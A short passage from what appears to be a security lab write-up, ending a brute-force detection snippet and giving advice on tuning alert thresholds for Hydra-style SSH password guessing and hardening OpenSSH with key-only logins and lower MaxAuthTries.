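    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

The threshold and window are deliberately small because Hydra's default parallelism (13 tasks in the run above) lands its guesses within a few seconds; tune both to the normal login noise of the site before alerting on them. On the prevention side the policy findings from the enum4linux section apply here as well: with no lockout or rate limit the guessing is never throttled, and on OpenSSH, disabling password logins (`PasswordAuthentication no`, keys only) or lowering `MaxAuthTries` removes or slows the attack surface these three tools depend on.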


